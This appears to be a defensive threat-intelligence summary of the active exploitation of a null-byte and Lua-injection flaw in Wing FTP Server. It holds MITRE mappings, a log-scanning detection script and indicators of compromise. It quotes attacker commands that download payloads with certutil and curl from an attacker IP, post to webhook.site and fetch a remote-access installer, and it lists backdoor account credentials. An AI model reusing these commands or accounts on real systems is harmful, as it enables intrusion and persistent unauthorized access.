Exploitation of Wing FTP Server Vulnerability

Huntress detected active exploitation of CVE-2025-47812, a null byte and Lua injection vulnerability in Wing FTP Server, on July 1, 2025. The exploit allows remote code execution at root/SYSTEM level, and attackers attempted various post-exploitation activities before being stopped by Microsoft Defender. #CVE202547812 #WingFTPServer #TrojanWin32CeproladA

Key points

  • CVE-2025-47812 is a null byte and Lua injection vulnerability in Wing FTP Server versions prior to 7.4.4 allowing root/SYSTEM remote code execution.
  • Exploitation was first observed by Huntress on July 1, 2025, shortly after public disclosure on June 30, 2025.
  • The exploit uses a crafted username with a null byte to inject Lua code into session object files, which is triggered by normal server operations.
  • Attackers performed reconnaissance commands, created backdoor user accounts, and attempted to run malicious scripts and download payloads.
  • Microsoft Defender detected and blocked a planted beacon, identified as Trojan:Win32/Ceprolad.A, disrupting the attack and crashing the Wing FTP Server process.
  • Multiple attacker IPs and infrastructure were identified, including use of webhook.site and ScreenConnect for remote access attempts.
  • Organizations running Wing FTP Server are urged to update immediately to version 7.4.4 to mitigate active exploitation.

MITRE Techniques

  • [T1078] Valid Accounts – Attackers used known or anonymous accounts to authenticate and initiate the exploit (‘A login attempt is made against the loginok.html endpoint via POST request’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The adversary executed reconnaissance and persistence commands such as ‘net user’ and ‘ipconfig’ using cmd.exe.
  • [T1105] Ingress Tool Transfer – Attackers downloaded malicious payloads using certutil and curl (‘certutil -urlcache -f http://185.196.9.225:8080/…’).
  • [T1136] Create Account – Attackers created backdoor user accounts like ‘wingftp’ and ‘wing’ using command shell commands.
  • [T1204] User Execution – Execution of malicious batch files and MSI installer attempts (‘cmd.exe /c c:/1.bat’ and download of ScreenConnect MSI installer).
  • [T1566.001] Phishing: Spearphishing Link – Use of webhook.site to communicate and track infections (‘curl -s -d con https://webhook.site/…’).
  • [T1543] Create or Modify System Process – Attempted installation and use of ScreenConnect for persistent remote access (‘local h = io.popen(“curl -o c:1.msi https://…ScreenConnect…”)’).
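As an added detection example (not code from Huntress or the Wing FTP project), the check below scans login-request log lines for the null-byte username pattern sent to the loginok.html endpoint described above. The log line format, the form field names and the sample lines are constructed assumptions for illustration; adapt the parser to the logs you actually collect.

```python
import re
from urllib.parse import parse_qsl

LOGIN_ENDPOINT = "/loginok.html"
# Lua constructs quoted from the observed payload; used only as a secondary signal
LUA_MARKERS = ("io.popen", "os.execute", "local ")

# Constructed sample log: "<client_ip> <METHOD> <path> <url-encoded form body>"
# (this layout is an assumption for the example, not Wing FTP's real log format)
SAMPLE_LOG = """\
10.0.0.5 POST /loginok.html username=alice&password=Secret1
203.0.113.7 POST /loginok.html username=anonymous%00local%20h%3Dio.popen(%22REDACTED%22)&password=x
10.0.0.9 GET /index.html -
198.51.100.4 POST /loginok.html username=bob%00&password=pw
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")


def analyze_line(line: str):
    """Return a finding dict for a suspicious loginok.html POST, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, path, body = m.groups()
    if method != "POST" or path != LOGIN_ENDPOINT:
        return None
    # parse_qsl percent-decodes values, so an encoded %00 becomes a real NUL character
    fields = dict(parse_qsl(body, keep_blank_values=True))
    user = fields.get("username", "")
    if "\x00" not in user:
        return None  # a legitimate login never carries a NUL inside the username
    prefix, tail = user.split("\x00", 1)
    reasons = ["null byte in username"]
    if any(marker in tail for marker in LUA_MARKERS):
        reasons.append("Lua-like code after the null byte")
    return {"client_ip": ip, "username_prefix": prefix, "reasons": reasons}


def scan(log_text: str) -> list:
    """Run analyze_line over every line of the log and keep the findings."""
    return [f for f in map(analyze_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A match on the null-byte rule alone is already a strong signal; the Lua-marker rule just raises confidence and should not be required, since the injected code after the NUL can be arbitrary.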

Indicators of Compromise

  • [IP Address] Attacker IPs involved in various stages of exploitation – 223.160.131.104, 149.248.44.88, 185.196.9.225, and others.
  • [Domain] Malicious URLs used for payload delivery and command and control – http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ, https://oooooooo11.screenconnect.com/bin/screenconnect.clientsetup.msi, https://webhook.site/5d112487-6133-4942-ac87-3f473d44bd81.
  • [File Hash] Malicious files detected – SHA256 c637ec00bd22da4539ec6def89cd9f7196a303d17632b1131a89d65e4f5698f4 (beacon executable), SHA256 f0fcc638cd93bdd6fb4745d75b491395a7a1b2cb08e0153a2eb417cb2f58d8ac (ScreenConnect MSI).
  • [Username] Backdoor user accounts created – wingftp, wing.
  • [Password] Passwords used by attackers for backdoor accounts – 123123qweqwe, 123123qweqweq.
  • [Detection] Microsoft Defender alert name – Trojan:Win32/Ceprolad.A.


Read more: https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild